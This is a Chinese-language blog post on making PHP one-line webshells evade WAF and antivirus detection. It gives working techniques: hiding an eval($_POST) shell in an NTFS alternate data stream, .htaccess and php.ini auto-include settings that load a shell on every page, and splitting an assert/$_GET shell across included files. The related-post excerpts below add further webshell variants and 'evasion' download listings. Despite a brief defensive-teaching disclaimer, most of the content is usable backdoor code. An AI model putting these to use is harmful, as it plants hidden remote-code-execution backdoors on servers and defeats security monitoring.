PHP一句话木马免杀(3)

最新推荐文章于 2024-09-02 20:37:59 发布
最新推荐文章于 2024-09-02 20:37:59 发布
阅读量1.1k 收藏 4
点赞数 3
分类专栏: Web安全笔记 代码审计 文章标签: 安全 免杀 一句话
本文链接:https://blog.csdn.net/weixin_43221560/article/details/109066465
版权
本文介绍了PHP木马免杀的几种方法,包括ADS隐藏、修改.htaccess文件、调整php.ini配置以及一句话木马的拆分。通过这些组合技巧,可以有效地规避WAF的检测。同时,作者提醒这些知识仅用于信息防御教学,不可用于非法活动。
摘要由CSDN通过智能技术生成

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

PHP木马免杀小技巧

免杀小技巧

1.ADS隐藏。

windows数据流有个很好的方式隐藏数据。
通过命令行

echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg

会在本地生成一个shell.php文件,但打开却发现没有内容,各种方式type啥的都不行。
通过命令行notepad才能打开编辑

notepad shell.php:123.jpg

但此文件无法直接运行。所以需要构造一个文件包含php

<?php include('shell.php:123.jpg');?>

2.修改.htaccess文件

AppType application/x-httpd-php  .jpg #会将本目录下的.jpg文件当做php代码运行。

php_value auto_append_file D:/123.txt #自动包含文件。

php_value auto_append_file .htaccess #包含自己。
#<?php phpinfo();

3.修改php.ini

修改auto_prepend_file = shell.txtauto_append_file= shell.txt
再修改include_path,可以通过任意页面进行访问include_path = ".;D:\phpstudy\www\"
在路徑D:\phpstudy\www\中写入webshell.txt

这样不管在任何页面都会自动加载我们的木马文件。

4.一句话拆分

原理通过文件包含和php的动态函数
拆分为多个文件,然后包含,通过动态函数实现。

在这里插入图片描述

#1.txt
<?php $_ = 'assert';?>

#2.txt
<?php $__='_GET';?>

#3.txt
<?php $___=$$__;?>

#index.php
<?php
include('1.txt');
include('2.txt');
include('3.txt');
@$_($___['xg']);?>

然后将123txt文件散布到各个文件夹,修改include包含的路径。

小结

waf的免杀绕过就是打乱木马的特征。
完全可以通过以上方式打组合拳来进行强力免杀。

自己整理的php免杀资料
在这里插入图片描述
可关注微信公众号:XG小刚
回复:PHP免杀
在这里插入图片描述

XG小刚
关注
专栏目录
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2532
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀。Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
一句话木马以及免杀
抚琴
01-08 3979
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3305
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
木马免杀处理
最新发布
weixin_58666006的博客
09-02 1322
木马免杀,脚本型木马和二进制型木马
php一句话木马免杀
qq_58683895的博客
11-21 2200
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
PHP一句话木马免杀
墨痕诉清风的博客
10-07 6046
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马免杀(通过VirusTotal测试)
m0_52233414的博客
01-28 3516
通过拼接,编码,加密等方法对PHP一句话木马进行免杀处理
一句话木马过狗 php,ASP/PHP一句话木马安全狗等杀软
weixin_28933797的博客
03-09 1287
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP一句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
PHP一句话 免杀
10-23
PHP一句话 免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
PHP免殺一句話
01-20
免殺一句話 使用ascii算法 range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a [113]).chr($a[115]);
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5338
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
简单的一句话木马免杀
2301_77927094的博客
12-21 772
php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的一句话木马能被低版本的D盾直接扫出,所以免杀必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查杀。必需,规定在字符串的何处开始替换。
PHP一句话木马免杀
小刚的博客
07-26 6573
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
php一句话免杀
收集盒 Book box
09-13 1071
by Tm3yShell7 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost
PHP一句话 免杀思路 分析
HoAd'blog
07-28 394
php免杀以及一个免杀的小马分享没什么技术含量,但是主要是学思路小马免杀思路最后后 没什么技术含量,但是主要是学思路 推荐新手观看 小马 通过base64编码,然后拆分了函数关键字,通过变量的引用等,然后@不报错,eval不能拆分使用 <?php $b=sert; $c=base64_encode($b); $d='as'.base64_decode($c); @$d($_POST['1']); ?> 很简单,然后还有下面是升级版免杀思路 免杀思路 异或函数的一个字母 用双重加密来绕过 弱类
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值